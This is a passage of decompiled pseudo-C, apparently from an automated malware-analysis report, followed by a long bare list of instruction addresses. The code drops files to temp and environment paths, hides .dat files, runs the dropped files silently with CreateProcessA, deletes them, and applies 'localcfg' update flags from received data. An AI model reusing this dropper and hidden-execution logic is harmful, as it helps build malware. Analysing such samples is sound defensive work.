																				SetFileAttributesA( &_v408, 0x80);
																			}
																		}
																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																		__eflags = _t766 - 0xffffffff;
																		if(_t766 == 0xffffffff) {
																			E0040EE2A(_t711,  &_v408, 0, 0x120);
																			GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																			E0040EE2A(_t711, "PromptOnSecureDesktop", 0, 0x100);
																			_t513 =  &_v408;
																			_t811 = _t811 + 0x2c;
																			_t768 = _t513 + 1;
																			do {
																				_t712 =  *_t513;
																				_t513 = _t513 + 1;
																				__eflags = _t712;
																			} while (_t712 != 0);
																			_t514 = _t513 - _t768;
																			__eflags = _t514;
																			if(_t514 != 0) {
																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
																				}
																			}
																			lstrcatA( &_v408,  &(_t797[0x104]));
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t545 = E0040EE95( &_v408, ".dat");
																				_pop(_t712);
																				__eflags = _t545;
																				if(_t545 != 0) {
																					SetFileAttributesA( &_v408, 0x80);
																				}
																			}
																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																			__eflags = _t769 - 0xffffffff;
																			if(_t769 != 0xffffffff) {
																				WriteFile(_t769,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																				CloseHandle(_t769);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t541 = E0040EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t541;
																					if(_t541 != 0) {
																						SetFileAttributesA( &_v408, 2);
																					}
																				}
																				_v12 = 1;
																			}
																			goto L143;
																		} else {
																			WriteFile(_t766,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																			CloseHandle(_t766);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t579 = E0040EE95( &_v408, ".dat");
																				__eflags = _t579;
																				if(_t579 != 0) {
																					SetFileAttributesA( &_v408, 2);
																				}
																			}
																			_v12 = 1;
																			_t552 = E0040EE95( &_v408, ".dat");
																			_pop(_t712);
																			__eflags = _t552;
																			if(_t552 == 0) {
																				L143:
																				__eflags =  *_t797 & 0x00000040;
																				if(( *_t797 & 0x00000040) != 0) {
																					E00408E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
																					_t811 = _t811 + 0x18;
																				}
																				__eflags =  *_t797 & 0x00000002;
																				if(( *_t797 & 0x00000002) != 0) {
																					__eflags = _v12;
																					if(__eflags != 0) {
																						E00407EAD(_t748, __eflags, 1);
																						E00407FCF(_t712);
																						_t770 = 0x44;
																						E0040EE2A(_t712,  &_v876, 0, _t770);
																						_t811 = _t811 + 0x10;
																						_v876.cb = _t770;
																						_t527 = CreateProcessA( &_v408, 0x410264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
																						__eflags = _t527;
																						if(_t527 == 0) {
																							E00407EE6(_t712);
																							E00407EAD(_t748, __eflags, 0);
																							DeleteFileA( &_v408);
																						} else {
																							CloseHandle(_v424.hThread);
																							CloseHandle(_v424);
																						}
																					}
																				}
																				goto L150;
																			} else {
																				E0040EE2A(_t712,  &_v408, 0, 0x120);
																				GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																				E0040EE2A(_t712, "PromptOnSecureDesktop", 0, 0x100);
																				_t559 =  &_v408;
																				_t811 = _t811 + 0x2c;
																				_t773 = _t559 + 1;
																				do {
																					_t712 =  *_t559;
																					_t559 = _t559 + 1;
																					__eflags = _t712;
																				} while (_t712 != 0);
																				_t560 = _t559 - _t773;
																				__eflags = _t560;
																				if(_t560 != 0) {
																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
																					}
																				}
																				lstrcatA( &_v408,  &(_t797[0x104]));
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t575 = E0040EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t575;
																					if(_t575 != 0) {
																						SetFileAttributesA( &_v408, 0x80);
																					}
																				}
																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																				__eflags = _t774 - 0xffffffff;
																				if(_t774 != 0xffffffff) {
																					WriteFile(_t774,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																					CloseHandle(_t774);
																					__eflags = _v39 - 0xc;
																					if(_v39 == 0xc) {
																						_t571 = E0040EE95( &_v408, ".dat");
																						_pop(_t712);
																						__eflags = _t571;
																						if(_t571 != 0) {
																							SetFileAttributesA( &_v408, 2);
																						}
																					}
																				}
																				goto L143;
																			}
																		}
																	}
																	_t588 = E0040ECA5();
																	_t711 = 5;
																	_t748 = _t588 % _t711 + 3;
																	__eflags = _t748;
																	_v17 = _t748;
																	if(_t748 == 0) {
																		L99:
																		 *(_t806 + _t765 - 0x194) = 0;
																		_t590 =  *_t797;
																		__eflags = _t590 & 0x0000000a;
																		if((_t590 & 0x0000000a) != 0) {
																			_t502 = E00402544("PromptOnSecureDesktop", 0x410694, 5, 0xe4, 0xc8);
																			_t811 = _t811 + 0x14;
																			goto L106;
																		}
																		__eflags = _t590 & 0x00000010;
																		if((_t590 & 0x00000010) == 0) {
																			__eflags = _t590 & 0x00000020;
																			if((_t590 & 0x00000020) == 0) {
																				goto L108;
																			}
																			_push(".dat");
																			goto L107;
																		}
																		_push(".sys");
																		goto L107;
																	} else {
																		goto L98;
																	}
																	do {
																		L98:
																		_t591 = E0040ECA5();
																		_t711 = 0x19;
																		_t748 = _t591 % _t711 + 0x61;
																		 *(_t806 + _t765 - 0x194) = _t748;
																		_t765 = _t765 + 1;
																		_t155 =  &_v17;
																		 *_t155 = _v17 - 1;
																		__eflags =  *_t155;
																	} while ( *_t155 != 0);
																	goto L99;
																}
																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
																__eflags = _t615 - 0x5c;
																if(_t615 != 0x5c) {
																	__eflags = _t615 - 0x2f;
																	L85:
																	if(__eflags != 0) {
																		 *(_t806 + _t765 - 0x194) = 0x5c;
																		_t765 = _t765 + 1;
																	}
																}
																goto L96;
																L69:
																_t748 =  *_t609;
																_t609 =  &(_t609[1]);
																__eflags = _t748;
																if(_t748 != 0) {
																	goto L69;
																} else {
																	__eflags = _t609 - _t726;
																	E0040EE08( &_v408, _t780, _t609 - _t726);
																	_t613 =  &_v408;
																	_t811 = _t811 + 0xc;
																	_t781 = _t613 + 1;
																	goto L71;
																}
															}
														}
													}
													__eflags =  *0x41211c & 0x00000004;
													if(( *0x41211c & 0x00000004) == 0) {
														continue;
													}
													__eflags = _v60;
													if(_v60 == 0) {
														continue;
													}
													__eflags =  *0x41201d; // 0x0
													if(__eflags == 0) {
														continue;
													}
													__imp__#3(_v16);
													Sleep(0x3e8);
													E0040E318();
													ExitProcess(0);
												} else {
													_t798 =  &(_t796[8]);
													__eflags = _t798;
													do {
														_t621 =  *(_t798 - 4);
														__eflags = _t621;
														if(_t621 == 0) {
															_v60 = 1;
															 *0x412138 =  *_t798;
														} else {
															_t624 = _t621 - 1;
															__eflags = _t624;
															if(_t624 == 0) {
																E0040EA84(1, "localcfg", "lid_file_upd",  *_t798);
																_t811 = _t811 + 0x10;
																 *0x41213c =  *_t798;
															} else {
																__eflags = _t624 == 1;
																if(_t624 == 1) {
																	E0040EA84(1, "localcfg", "flags_upd",  *_t798);
																	_t811 = _t811 + 0x10;
																	 *0x41211c =  *0x41211c |  *_t798;
																}
															}
														}
														_t764 = _t764 + 1;
														_t798 =  &(_t798[2]);
														__eflags = _t764 -  *_v8;
													} while (_t764 <  *_v8);
													goto L57;
												}
											}
											__eflags = _t395 - 0x1b;
											if(_t395 != 0x1b) {
												goto L156;
											}
											__eflags = _v52 - 0xc;
											if(_v52 <= 0xc) {
												_t630 =  *0x4136b0;
												 *0x4121a4 = _t630[4];
												 *0x4122d4 = _t630[8];
												_t632 = E0040F04E(0);
												asm("adc edx, ebx");
												 *0x4136a8 = _t632 + 0xe10;
												 *0x4136ac = _t748;
												continue;
											}
											_t634 = E00407E2F(_t748);
											__eflags = _t634;
											if(_t634 != 0) {
												continue;
											}
											_v12 =  *0x4136b0;
											__eflags =  *0x4121a8; // 0x0
											if(__eflags == 0) {
												L45:
												_t636 = _v12;
												 *0x4121a4 =  *(_t636 + 4);
												 *0x4122d4 =  *(_t636 + 8);
												E00407EAD(_t748, __eflags, 0);
												goto L46;
											} else {
												GetTempPathA(0x120,  &_v408);
												_t642 = E00408274( &_v408);
												_pop(_t709);
												_t782 = _t642;
												_t801 = (E0040ECA5() & 0x00000003) + 5;
												goto L38;
												L38:
												__eflags = _t801;
												if(_t801 > 0) {
													_t644 = E0040ECA5();
													_t709 = 0x1a;
													_t748 = _t644 % _t709 + 0x61;
													 *(_t806 + _t782 - 0x194) = _t748;
													_t782 = _t782 + 1;
													_t801 = _t801 - 1;
													__eflags = _t801;
													goto L38;
												} else {
													E0040EF00(_t806 + _t782 - 0x194, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
													E0040EE2A(_t709, 0x4122f8, 0, 0x100);
													_t811 = _t811 + 0x28;
													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
													_v8 = _t651;
													__eflags = _t651 - 0xffffffff;
													if(__eflags != 0) {
														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
														_push(_v8);
														__eflags = _t657;
														if(__eflags == 0) {
															CloseHandle();
														} else {
															CloseHandle();
															_push(0x4121a8);
															_push( &_v408);
															wsprintfA( &_v1176, E00402544(0x4122f8, 0x410fe4, 0xc, 0xe4, 0xc8));
															E0040EE2A(_t709, 0x4122f8, 0, 0x100);
															_t803 = 0x44;
															E0040EE2A(_t709,  &_v808, 0, 0x4122f8);
															_v808.cb = _t803;
															E0040EE2A(_t709,  &_v120, 0, 0x10);
															_t811 = _t811 + 0x48;
															E00407FCF(_t709);
															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
															__eflags = _t673;
															if(_t673 != 0) {
																WaitForSingleObject(_v120.hProcess, 0xea60);
																CloseHandle(_v120.hThread);
																CloseHandle(_v120);
																_t681 = E0040F04E(0) + 0xe10;
																__eflags = _t681;
																asm("adc edx, ebx");
																_pop(_t709);
																 *0x4136a8 = _t681;
																 *0x4136ac = _t748;
															}
															E00407EE6(_t709);
															DeleteFileA( &_v408);
														}
													}
													goto L45;
												}
											}
										}
										L228:
										__imp__#3(_v16);
										E0040E318();
										return _v68;
									} else {
										__imp__#3(_v16);
										goto L21;
									}
								}
								L15:
								__imp__#3(_v16);
							}
							return E0040C8AA(_t829);
						} else {
							_t805 =  *0x413670;
							while(_v12 < _t805) {
								asm("cdq");
								_t747 = (_t747 + 1) % _t805;
								 *0x41367c =  *0x41367c + 1;
								_v12 =  &(_v12[1]);
								 *0x413674 = _t747;
								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					}
					_t686 = E0040EBCC(0x100000);
					 *0x4136b0 = _t686;
					if(_t686 == 0) {
						goto L21;
					}
					goto L7;
				}
			}











































































































































































                                                                                                                                  0x0040c921
                                                                                                                                  0x0040c924
                                                                                                                                  0x0040c92d
                                                                                                                                  0x0040c937
                                                                                                                                  0x0040c937
                                                                                                                                  0x0040c942
                                                                                                                                  0x0040cb69
                                                                                                                                  0x0040cb69
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c954
                                                                                                                                  0x0040c973
                                                                                                                                  0x0040c986
                                                                                                                                  0x0040c98b
                                                                                                                                  0x0040c990
                                                                                                                                  0x0040c993
                                                                                                                                  0x0040c99e
                                                                                                                                  0x0040c9b8
                                                                                                                                  0x0040c9b8
                                                                                                                                  0x0040c9be
                                                                                                                                  0x0040c9c9
                                                                                                                                  0x0040c9d0
                                                                                                                                  0x0040c9fd
                                                                                                                                  0x0040c9fd
                                                                                                                                  0x0040ca00
                                                                                                                                  0x0040ca03
                                                                                                                                  0x0040ca08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ca18
                                                                                                                                  0x0040ca1f
                                                                                                                                  0x0040ca22
                                                                                                                                  0x0040ca24
                                                                                                                                  0x0040ca3f
                                                                                                                                  0x0040ca44
                                                                                                                                  0x0040ca47
                                                                                                                                  0x0040ca49
                                                                                                                                  0x0040ca5e
                                                                                                                                  0x0040ca63
                                                                                                                                  0x0040ca6e
                                                                                                                                  0x0040ca6f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ca71
                                                                                                                                  0x0040ca78
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ca7a
                                                                                                                                  0x0040ca81
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ca95
                                                                                                                                  0x0040ca9b
                                                                                                                                  0x0040caa1
                                                                                                                                  0x0040caa7
                                                                                                                                  0x0040cab8
                                                                                                                                  0x0040cac2
                                                                                                                                  0x0040cac5
                                                                                                                                  0x0040cad4
                                                                                                                                  0x0040cae7
                                                                                                                                  0x0040caf7
                                                                                                                                  0x0040cb09
                                                                                                                                  0x0040cb27
                                                                                                                                  0x0040cb2d
                                                                                                                                  0x0040cb37
                                                                                                                                  0x0040cb3d
                                                                                                                                  0x0040cb47
                                                                                                                                  0x0040cb4d
                                                                                                                                  0x0040cb54
                                                                                                                                  0x0040cb59
                                                                                                                                  0x0040cb5c
                                                                                                                                  0x0040cb5e
                                                                                                                                  0x0040cb70
                                                                                                                                  0x0040cb76
                                                                                                                                  0x0040cb7c
                                                                                                                                  0x0040cb7c
                                                                                                                                  0x0040cb7c
                                                                                                                                  0x0040cb9e
                                                                                                                                  0x0040cba3
                                                                                                                                  0x0040cba6
                                                                                                                                  0x0040cba9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cbaf
                                                                                                                                  0x0040cbb1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cbb3
                                                                                                                                  0x0040cbb6
                                                                                                                                  0x0040cbb8
                                                                                                                                  0x0040daea
                                                                                                                                  0x0040daea
                                                                                                                                  0x0040daeb
                                                                                                                                  0x0040daf0
                                                                                                                                  0x0040daf2
                                                                                                                                  0x0040daf5
                                                                                                                                  0x0040daf7
                                                                                                                                  0x0040dafd
                                                                                                                                  0x0040daff
                                                                                                                                  0x0040db02
                                                                                                                                  0x0040db0b
                                                                                                                                  0x0040db1b
                                                                                                                                  0x0040db20
                                                                                                                                  0x0040db20
                                                                                                                                  0x0040db02
                                                                                                                                  0x0040dafd
                                                                                                                                  0x0040db23
                                                                                                                                  0x0040db24
                                                                                                                                  0x0040db24
                                                                                                                                  0x00000000
                                                                                                                                  0x0040db29
                                                                                                                                  0x0040cbbe
                                                                                                                                  0x0040cbc1
                                                                                                                                  0x0040d662
                                                                                                                                  0x0040d667
                                                                                                                                  0x0040d669
                                                                                                                                  0x0040d66c
                                                                                                                                  0x0040d66f
                                                                                                                                  0x0040d672
                                                                                                                                  0x0040d675
                                                                                                                                  0x0040d6c7
                                                                                                                                  0x0040d6c7
                                                                                                                                  0x0040d6cb
                                                                                                                                  0x0040d707
                                                                                                                                  0x0040d707
                                                                                                                                  0x0040d70b
                                                                                                                                  0x0040d754
                                                                                                                                  0x0040d754
                                                                                                                                  0x0040d758
                                                                                                                                  0x0040d79e
                                                                                                                                  0x0040d79e
                                                                                                                                  0x0040d7a2
                                                                                                                                  0x0040d8b3
                                                                                                                                  0x0040d8b3
                                                                                                                                  0x0040d8ba
                                                                                                                                  0x0040d93a
                                                                                                                                  0x0040d93a
                                                                                                                                  0x0040d941
                                                                                                                                  0x0040da0e
                                                                                                                                  0x0040da0e
                                                                                                                                  0x0040da11
                                                                                                                                  0x0040da11
                                                                                                                                  0x0040da14
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da1d
                                                                                                                                  0x0040da23
                                                                                                                                  0x0040da25
                                                                                                                                  0x0040da90
                                                                                                                                  0x0040da90
                                                                                                                                  0x0040da94
                                                                                                                                  0x0040da9b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040daa1
                                                                                                                                  0x0040daa4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040dabf
                                                                                                                                  0x0040dac2
                                                                                                                                  0x0040dac7
                                                                                                                                  0x0040daca
                                                                                                                                  0x0040dacc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040dacc
                                                                                                                                  0x0040da27
                                                                                                                                  0x0040da2a
                                                                                                                                  0x0040da2c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da42
                                                                                                                                  0x0040da7d
                                                                                                                                  0x0040da7d
                                                                                                                                  0x0040da80
                                                                                                                                  0x0040da83
                                                                                                                                  0x0040da85
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da5f
                                                                                                                                  0x0040da64
                                                                                                                                  0x0040da67
                                                                                                                                  0x0040da69
                                                                                                                                  0x0040da89
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da89
                                                                                                                                  0x0040da7a
                                                                                                                                  0x0040da7a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da87
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da11
                                                                                                                                  0x0040d947
                                                                                                                                  0x0040d94c
                                                                                                                                  0x0040d94e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d955
                                                                                                                                  0x0040d95b
                                                                                                                                  0x0040d961
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d967
                                                                                                                                  0x0040d975
                                                                                                                                  0x0040d975
                                                                                                                                  0x0040d97b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d981
                                                                                                                                  0x0040d987
                                                                                                                                  0x0040d9c9
                                                                                                                                  0x0040d9c9
                                                                                                                                  0x0040d9ce
                                                                                                                                  0x0040d9d0
                                                                                                                                  0x0040d9d6
                                                                                                                                  0x0040d9d9
                                                                                                                                  0x0040d9df
                                                                                                                                  0x0040d9f7
                                                                                                                                  0x0040d9fe
                                                                                                                                  0x0040da03
                                                                                                                                  0x0040da06
                                                                                                                                  0x0040da08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da08
                                                                                                                                  0x0040d998
                                                                                                                                  0x0040d99a
                                                                                                                                  0x0040d99d
                                                                                                                                  0x0040d99f
                                                                                                                                  0x0040d9ab
                                                                                                                                  0x0040d9b4
                                                                                                                                  0x0040d9b9
                                                                                                                                  0x0040d9be
                                                                                                                                  0x0040d9be
                                                                                                                                  0x0040d9c1
                                                                                                                                  0x0040d9c7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d9c7
                                                                                                                                  0x0040d969
                                                                                                                                  0x0040d96f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d96f
                                                                                                                                  0x0040d8da
                                                                                                                                  0x0040d8df
                                                                                                                                  0x0040d8e4
                                                                                                                                  0x0040d8e7
                                                                                                                                  0x0040d8ea
                                                                                                                                  0x0040d8ea
                                                                                                                                  0x0040d8ec
                                                                                                                                  0x0040d8ed
                                                                                                                                  0x0040d8ed
                                                                                                                                  0x0040d8f1
                                                                                                                                  0x0040d8f3
                                                                                                                                  0x0040d8f6
                                                                                                                                  0x0040d8f8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d903
                                                                                                                                  0x0040d918
                                                                                                                                  0x0040d92a
                                                                                                                                  0x0040d92f
                                                                                                                                  0x0040d932
                                                                                                                                  0x0040d934
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d934
                                                                                                                                  0x0040d7a8
                                                                                                                                  0x0040d7aa
                                                                                                                                  0x0040d7b0
                                                                                                                                  0x0040d7be
                                                                                                                                  0x0040d7c3
                                                                                                                                  0x0040d7cf
                                                                                                                                  0x0040d7d6
                                                                                                                                  0x0040d7e1
                                                                                                                                  0x0040d7e2
                                                                                                                                  0x0040d7e2
                                                                                                                                  0x0040d7e5
                                                                                                                                  0x0040d7ed
                                                                                                                                  0x0040d7ee
                                                                                                                                  0x0040d7f4
                                                                                                                                  0x0040d81f
                                                                                                                                  0x0040d825
                                                                                                                                  0x0040d828
                                                                                                                                  0x0040d828
                                                                                                                                  0x0040d82a
                                                                                                                                  0x0040d830
                                                                                                                                  0x0040d832
                                                                                                                                  0x0040d85b
                                                                                                                                  0x0040d85b
                                                                                                                                  0x0040d85d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d878
                                                                                                                                  0x0040d87f
                                                                                                                                  0x0040d884
                                                                                                                                  0x0040d887
                                                                                                                                  0x0040d889
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d88f
                                                                                                                                  0x0040d895
                                                                                                                                  0x0040d897
                                                                                                                                  0x0040d897
                                                                                                                                  0x0040d89d
                                                                                                                                  0x0040d8a2
                                                                                                                                  0x0040d8a4
                                                                                                                                  0x0040d8a7
                                                                                                                                  0x0040d8ad
                                                                                                                                  0x0040d8ad
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d834
                                                                                                                                  0x0040d834
                                                                                                                                  0x0040d836
                                                                                                                                  0x0040d836
                                                                                                                                  0x0040d839
                                                                                                                                  0x0040d839
                                                                                                                                  0x0040d83b
                                                                                                                                  0x0040d83c
                                                                                                                                  0x0040d83c
                                                                                                                                  0x0040d842
                                                                                                                                  0x0040d850
                                                                                                                                  0x0040d855
                                                                                                                                  0x0040d858
                                                                                                                                  0x0040d858
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d858
                                                                                                                                  0x0040d832
                                                                                                                                  0x0040d783
                                                                                                                                  0x0040d792
                                                                                                                                  0x0040d797
                                                                                                                                  0x0040d79a
                                                                                                                                  0x0040d79c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d773
                                                                                                                                  0x0040d778
                                                                                                                                  0x0040d77b
                                                                                                                                  0x0040d77d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d77d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d783
                                                                                                                                  0x0040d70d
                                                                                                                                  0x0040d712
                                                                                                                                  0x0040d718
                                                                                                                                  0x0040d71f
                                                                                                                                  0x0040d721
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d73d
                                                                                                                                  0x0040d744
                                                                                                                                  0x0040d749
                                                                                                                                  0x0040d74c
                                                                                                                                  0x0040d74e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d74e
                                                                                                                                  0x0040d6d3
                                                                                                                                  0x0040d6f0
                                                                                                                                  0x0040d6f7
                                                                                                                                  0x0040d6fc
                                                                                                                                  0x0040d6ff
                                                                                                                                  0x0040d701
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d701
                                                                                                                                  0x0040d67a
                                                                                                                                  0x0040d67b
                                                                                                                                  0x0040d67c
                                                                                                                                  0x0040d6bb
                                                                                                                                  0x0040d6bb
                                                                                                                                  0x0040d6c0
                                                                                                                                  0x0040d6c3
                                                                                                                                  0x0040d6c5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d67f
                                                                                                                                  0x0040d696
                                                                                                                                  0x0040d69d
                                                                                                                                  0x0040d6a2
                                                                                                                                  0x0040d6a5
                                                                                                                                  0x0040d6a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d6b0
                                                                                                                                  0x0040d6b0
                                                                                                                                  0x0040d6b3
                                                                                                                                  0x0040d6b4
                                                                                                                                  0x0040d6b5
                                                                                                                                  0x0040d6b5
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d6bb
                                                                                                                                  0x0040cbc7
                                                                                                                                  0x0040cbca
                                                                                                                                  0x0040d5f2
                                                                                                                                  0x0040d5f8
                                                                                                                                  0x0040d5fa
                                                                                                                                  0x0040d611
                                                                                                                                  0x0040d616
                                                                                                                                  0x0040d61e
                                                                                                                                  0x0040d621
                                                                                                                                  0x0040d623
                                                                                                                                  0x0040d62e
                                                                                                                                  0x0040d635
                                                                                                                                  0x0040d637
                                                                                                                                  0x0040d63d
                                                                                                                                  0x0040d643
                                                                                                                                  0x0040d649
                                                                                                                                  0x0040d64f
                                                                                                                                  0x0040d655
                                                                                                                                  0x0040d65a
                                                                                                                                  0x0040d65a
                                                                                                                                  0x0040d637
                                                                                                                                  0x0040d623
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d5fa
                                                                                                                                  0x0040cbd0
                                                                                                                                  0x0040cbd3
                                                                                                                                  0x0040d5e1
                                                                                                                                  0x0040cdec
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cdec
                                                                                                                                  0x0040cbd9
                                                                                                                                  0x0040d589
                                                                                                                                  0x0040d589
                                                                                                                                  0x0040d589
                                                                                                                                  0x0040d58b
                                                                                                                                  0x0040d58b
                                                                                                                                  0x0040d591
                                                                                                                                  0x0040d593
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d595
                                                                                                                                  0x0040d598
                                                                                                                                  0x0040d59a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d59c
                                                                                                                                  0x0040d59e
                                                                                                                                  0x0040d59e
                                                                                                                                  0x0040d5a1
                                                                                                                                  0x0040d5a1
                                                                                                                                  0x0040d5a3
                                                                                                                                  0x0040d5a5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d5a7
                                                                                                                                  0x0040d5aa
                                                                                                                                  0x0040d5c3
                                                                                                                                  0x0040d5c5
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d5c5
                                                                                                                                  0x0040d5ac
                                                                                                                                  0x0040d5ad
                                                                                                                                  0x0040d5b0
                                                                                                                                  0x0040d5b3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d5b5
                                                                                                                                  0x0040d5c8
                                                                                                                                  0x0040d5c8
                                                                                                                                  0x0040d5cb
                                                                                                                                  0x0040d5cb
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d5d3
                                                                                                                                  0x0040cbdf
                                                                                                                                  0x0040cbe2
                                                                                                                                  0x0040ce26
                                                                                                                                  0x0040ce2c
                                                                                                                                  0x0040ce2e
                                                                                                                                  0x0040ce31
                                                                                                                                  0x0040ce34
                                                                                                                                  0x0040ce36
                                                                                                                                  0x0040cea0
                                                                                                                                  0x0040cea6
                                                                                                                                  0x0040cea8
                                                                                                                                  0x0040ceaf
                                                                                                                                  0x0040ceb9
                                                                                                                                  0x0040cebf
                                                                                                                                  0x0040cec2
                                                                                                                                  0x0040d53e
                                                                                                                                  0x0040d53e
                                                                                                                                  0x0040d541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cec9
                                                                                                                                  0x0040cecc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ced2
                                                                                                                                  0x0040ced5
                                                                                                                                  0x0040d519
                                                                                                                                  0x0040d519
                                                                                                                                  0x0040d524
                                                                                                                                  0x0040d526
                                                                                                                                  0x0040d529
                                                                                                                                  0x0040d53b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cedb
                                                                                                                                  0x0040cee8
                                                                                                                                  0x0040ceed
                                                                                                                                  0x0040ceef
                                                                                                                                  0x0040cef2
                                                                                                                                  0x0040cef4
                                                                                                                                  0x0040cef9
                                                                                                                                  0x0040cefe
                                                                                                                                  0x0040cf00
                                                                                                                                  0x0040cf00
                                                                                                                                  0x0040cf02
                                                                                                                                  0x0040cf02
                                                                                                                                  0x0040cf04
                                                                                                                                  0x0040cf06
                                                                                                                                  0x0040cf0b
                                                                                                                                  0x0040cf0d
                                                                                                                                  0x0040cf12
                                                                                                                                  0x0040cf14
                                                                                                                                  0x0040cf1a
                                                                                                                                  0x0040cf20
                                                                                                                                  0x0040cf20
                                                                                                                                  0x0040cf1c
                                                                                                                                  0x0040cf1c
                                                                                                                                  0x0040cf1c
                                                                                                                                  0x0040cf25
                                                                                                                                  0x0040cf25
                                                                                                                                  0x0040cf27
                                                                                                                                  0x0040cf29
                                                                                                                                  0x0040cf2b
                                                                                                                                  0x0040cf81
                                                                                                                                  0x0040cf83
                                                                                                                                  0x0040cfdc
                                                                                                                                  0x0040cfe1
                                                                                                                                  0x0040d020
                                                                                                                                  0x0040d025
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d033
